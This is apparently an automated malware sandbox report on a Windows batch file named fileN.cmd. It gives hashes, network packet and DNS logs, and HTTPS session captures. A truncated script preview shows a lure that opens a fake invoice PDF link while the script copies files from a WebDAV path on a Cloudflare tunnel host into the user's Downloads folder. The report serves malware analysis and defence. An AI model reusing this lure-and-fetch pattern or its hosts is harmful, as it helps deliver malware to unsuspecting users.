SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://s2r.tn/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 48

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://s2r.tn/cgi/INVOICERVSHA.pdf
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Static File Info

General

File type:	DOS batch file, ASCII text, with CRLF line terminators
Entropy (8bit):	5.055753899661047
TrID:
File name:	fileN.cmd
File size:	2'029 bytes
MD5:	b0440336a17e2a86c8fdaab419c3a3f7
SHA1:	f831b05ff3fc56c2e023e4121e07b895fe1d9153
SHA256:	7d5848842e934d5a57fb8766962a556e01c3715481d63d2a10dbca4bac897ddf
SHA512:	98d631901af6b240356c6443ba3c7a20af35034189f38caedd87790a034bedadf784aa034a77438d14574193eb5037c3778a5c05201bfe1380d62c56efd66f27
SSDEEP:	48:7Zc2Nq7rGuszsES/dasE1TmJn4JWsEd9BjNRJ412QsEIpSY4c:mLjZESFHE1e4ZEd9BZRe01EIIlc
TLSH:	7D41F4C2354E403C92B0AB32BE308997D566608EB344A915B0F6C4ED0F665D85AFE7E5
File Content Preview:	@echo off..setlocal....set source=\\maintenance-princess-musical-vocational.trycloudflare.com@SSL\DavWWWRoot\google\Win..set destination=%USERPROFILE%\Downloads....echo Opening PDF file.....start "" "https://s2r.tn/cgi/INVOICERVSHA.pdf"....copy /Y "%sourc

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 21:06:44.864469051 CEST	49674	443	192.168.2.6	173.222.162.64
May 23, 2024 21:06:44.864521027 CEST	49673	443	192.168.2.6	173.222.162.64
May 23, 2024 21:06:45.176999092 CEST	49672	443	192.168.2.6	173.222.162.64
May 23, 2024 21:06:50.196844101 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.196902037 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.198009014 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.198009014 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.198009014 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.198019981 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.198065996 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.198106050 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.198499918 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.198512077 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.734395027 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.734668016 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.734687090 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.735738993 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.736166000 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.736201048 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.737061024 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.737061024 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.737061024 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.737071991 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.737092972 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.737162113 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.738116026 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.738735914 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.741008043 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.741094112 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.786214113 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.786214113 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.786237001 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.786252022 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.833441973 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.833484888 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.917114973 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.917335033 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:50.917659998 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.920131922 CEST	49704	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:50.920149088 CEST	443	49704	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.039525032 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.086503029 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.157855034 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.157963037 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.158107996 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.167824984 CEST	49705	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.167850018 CEST	443	49705	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.182503939 CEST	49707	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.182538986 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.182837009 CEST	49707	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.182837009 CEST	49707	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.182867050 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.730792046 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.731230021 CEST	49707	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.731252909 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.731597900 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.732057095 CEST	49707	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.732117891 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.732300997 CEST	49707	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.778539896 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.931917906 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.931994915 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:51.932051897 CEST	49707	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.933093071 CEST	49707	443	192.168.2.6	70.38.21.234
May 23, 2024 21:06:51.933109999 CEST	443	49707	70.38.21.234	192.168.2.6
May 23, 2024 21:06:54.033612013 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:06:54.033651114 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:06:54.033754110 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:06:54.033947945 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:06:54.033958912 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:06:54.322164059 CEST	49711	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:54.322205067 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:54.322261095 CEST	49711	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:54.327789068 CEST	49711	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:54.327805996 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:54.472392082 CEST	49673	443	192.168.2.6	173.222.162.64
May 23, 2024 21:06:54.472553015 CEST	49674	443	192.168.2.6	173.222.162.64
May 23, 2024 21:06:54.722141027 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:06:54.722440004 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:06:54.722466946 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:06:54.723447084 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:06:54.723531961 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:06:54.724839926 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:06:54.724912882 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:06:54.769747019 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:06:54.769764900 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:06:54.786144018 CEST	49672	443	192.168.2.6	173.222.162.64
May 23, 2024 21:06:54.831406116 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:06:54.989007950 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:54.989099979 CEST	49711	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:54.996396065 CEST	49711	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:54.996431112 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:54.996794939 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:55.049631119 CEST	49711	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:55.094497919 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:55.305258989 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:55.305335045 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:55.305412054 CEST	49711	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:55.307682037 CEST	49711	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:55.307703972 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:55.307718039 CEST	49711	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:55.307723999 CEST	443	49711	184.28.90.27	192.168.2.6
May 23, 2024 21:06:55.348104954 CEST	49712	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:55.348146915 CEST	443	49712	184.28.90.27	192.168.2.6
May 23, 2024 21:06:55.348229885 CEST	49712	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:55.348548889 CEST	49712	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:55.348563910 CEST	443	49712	184.28.90.27	192.168.2.6
May 23, 2024 21:06:56.032040119 CEST	443	49712	184.28.90.27	192.168.2.6
May 23, 2024 21:06:56.032139063 CEST	49712	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:56.033763885 CEST	49712	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:56.033771992 CEST	443	49712	184.28.90.27	192.168.2.6
May 23, 2024 21:06:56.034063101 CEST	443	49712	184.28.90.27	192.168.2.6
May 23, 2024 21:06:56.037966967 CEST	49712	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:56.078496933 CEST	443	49712	184.28.90.27	192.168.2.6
May 23, 2024 21:06:56.360008955 CEST	443	49712	184.28.90.27	192.168.2.6
May 23, 2024 21:06:56.360199928 CEST	443	49712	184.28.90.27	192.168.2.6
May 23, 2024 21:06:56.360261917 CEST	49712	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:56.366257906 CEST	49712	443	192.168.2.6	184.28.90.27
May 23, 2024 21:06:56.366290092 CEST	443	49712	184.28.90.27	192.168.2.6
May 23, 2024 21:06:56.534126997 CEST	443	49698	173.222.162.64	192.168.2.6
May 23, 2024 21:06:56.539480925 CEST	49698	443	192.168.2.6	173.222.162.64
May 23, 2024 21:07:04.619925976 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:07:04.620075941 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:07:04.620254040 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:07:06.088428974 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:06.088469982 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:06.088547945 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:06.090106010 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:06.090122938 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:06.130872965 CEST	49710	443	192.168.2.6	216.58.212.132
May 23, 2024 21:07:06.130903006 CEST	443	49710	216.58.212.132	192.168.2.6
May 23, 2024 21:07:06.976500034 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:06.976586103 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:06.980107069 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:06.980119944 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:06.980385065 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.035114050 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:07.592914104 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:07.638506889 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.866928101 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.866955996 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.866962910 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.866977930 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.866986990 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.866995096 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.867063999 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:07.867088079 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.867141962 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:07.881252050 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.881330967 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:07.881340027 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:07.881403923 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:08.443254948 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:08.443283081 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:08.443698883 CEST	49714	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:08.443707943 CEST	443	49714	20.114.59.183	192.168.2.6
May 23, 2024 21:07:44.889040947 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:44.889086008 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:44.889266014 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:44.889583111 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:44.889600039 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:45.800440073 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:45.800626993 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:45.805188894 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:45.805196047 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:45.805403948 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:45.814505100 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:45.862488985 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:46.188422918 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:46.188445091 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:46.188509941 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:46.188535929 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:46.188555002 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:46.188585997 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:46.188608885 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:46.206085920 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:46.206140041 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:46.206181049 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:46.206193924 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:46.206268072 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:46.206430912 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:46.206445932 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:46.206458092 CEST	49720	443	192.168.2.6	20.114.59.183
May 23, 2024 21:07:46.206464052 CEST	443	49720	20.114.59.183	192.168.2.6
May 23, 2024 21:07:54.086699963 CEST	49722	443	192.168.2.6	216.58.212.132
May 23, 2024 21:07:54.086755037 CEST	443	49722	216.58.212.132	192.168.2.6
May 23, 2024 21:07:54.086829901 CEST	49722	443	192.168.2.6	216.58.212.132
May 23, 2024 21:07:54.087100029 CEST	49722	443	192.168.2.6	216.58.212.132
May 23, 2024 21:07:54.087112904 CEST	443	49722	216.58.212.132	192.168.2.6
May 23, 2024 21:07:54.772095919 CEST	443	49722	216.58.212.132	192.168.2.6
May 23, 2024 21:07:54.772486925 CEST	49722	443	192.168.2.6	216.58.212.132
May 23, 2024 21:07:54.772511959 CEST	443	49722	216.58.212.132	192.168.2.6
May 23, 2024 21:07:54.773000002 CEST	443	49722	216.58.212.132	192.168.2.6
May 23, 2024 21:07:54.773376942 CEST	49722	443	192.168.2.6	216.58.212.132
May 23, 2024 21:07:54.773438931 CEST	443	49722	216.58.212.132	192.168.2.6
May 23, 2024 21:07:54.819576025 CEST	49722	443	192.168.2.6	216.58.212.132
May 23, 2024 21:08:04.690757990 CEST	443	49722	216.58.212.132	192.168.2.6
May 23, 2024 21:08:04.690849066 CEST	443	49722	216.58.212.132	192.168.2.6
May 23, 2024 21:08:04.690917969 CEST	49722	443	192.168.2.6	216.58.212.132
May 23, 2024 21:08:06.135876894 CEST	49722	443	192.168.2.6	216.58.212.132
May 23, 2024 21:08:06.135912895 CEST	443	49722	216.58.212.132	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 21:06:49.914915085 CEST	51783	53	192.168.2.6	1.1.1.1
May 23, 2024 21:06:49.915049076 CEST	57336	53	192.168.2.6	1.1.1.1
May 23, 2024 21:06:49.932502985 CEST	53	55368	1.1.1.1	192.168.2.6
May 23, 2024 21:06:49.989629984 CEST	53	61033	1.1.1.1	192.168.2.6
May 23, 2024 21:06:50.146300077 CEST	53	51783	1.1.1.1	192.168.2.6
May 23, 2024 21:06:51.237035036 CEST	53	51407	1.1.1.1	192.168.2.6
May 23, 2024 21:06:51.683116913 CEST	53	57336	1.1.1.1	192.168.2.6
May 23, 2024 21:06:54.020451069 CEST	57745	53	192.168.2.6	1.1.1.1
May 23, 2024 21:06:54.020580053 CEST	63478	53	192.168.2.6	1.1.1.1
May 23, 2024 21:06:54.027698040 CEST	53	57745	1.1.1.1	192.168.2.6
May 23, 2024 21:06:54.032897949 CEST	53	63478	1.1.1.1	192.168.2.6
May 23, 2024 21:07:09.744452000 CEST	53	61704	1.1.1.1	192.168.2.6
May 23, 2024 21:07:28.604208946 CEST	53	53979	1.1.1.1	192.168.2.6
May 23, 2024 21:07:49.315962076 CEST	53	58691	1.1.1.1	192.168.2.6
May 23, 2024 21:07:51.735074043 CEST	53	55040	1.1.1.1	192.168.2.6
May 23, 2024 21:08:17.905232906 CEST	53	51536	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 23, 2024 21:06:51.683187962 CEST	192.168.2.6	1.1.1.1	c21d	(Port unreachable)	Destination Unreachable
May 23, 2024 21:08:19.039011002 CEST	192.168.2.6	1.1.1.1	c235	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2024 21:06:49.914915085 CEST	192.168.2.6	1.1.1.1	0x9236	Standard query (0)	s2r.tn	A (IP address)	IN (0x0001)	false
May 23, 2024 21:06:49.915049076 CEST	192.168.2.6	1.1.1.1	0x2d7c	Standard query (0)	s2r.tn	65	IN (0x0001)	false
May 23, 2024 21:06:54.020451069 CEST	192.168.2.6	1.1.1.1	0x12e9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 23, 2024 21:06:54.020580053 CEST	192.168.2.6	1.1.1.1	0xe9a6	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 23, 2024 21:06:50.146300077 CEST	1.1.1.1	192.168.2.6	0x9236	No error (0)	s2r.tn	70.38.21.234	A (IP address)	IN (0x0001)	false
May 23, 2024 21:06:54.027698040 CEST	1.1.1.1	192.168.2.6	0x12e9	No error (0)	www.google.com	216.58.212.132	A (IP address)	IN (0x0001)	false
May 23, 2024 21:06:54.032897949 CEST	1.1.1.1	192.168.2.6	0xe9a6	No error (0)	www.google.com		65	IN (0x0001)	false

HTTP Request Dependency Graph

s2r.tn

https:

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49704	70.38.21.234	443	4092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 19:06:50 UTC	669	OUT	GET /cgi/INVOICERVSHA.pdf HTTP/1.1 Host: s2r.tn Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 19:06:50 UTC	164	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 19:06:50 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-05-23 19:06:50 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49705	70.38.21.234	443	4092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 19:06:51 UTC	588	OUT	GET /favicon.ico HTTP/1.1 Host: s2r.tn Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://s2r.tn/cgi/INVOICERVSHA.pdf Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 19:06:51 UTC	164	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 19:06:51 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-05-23 19:06:51 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49707	70.38.21.234	443	4092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
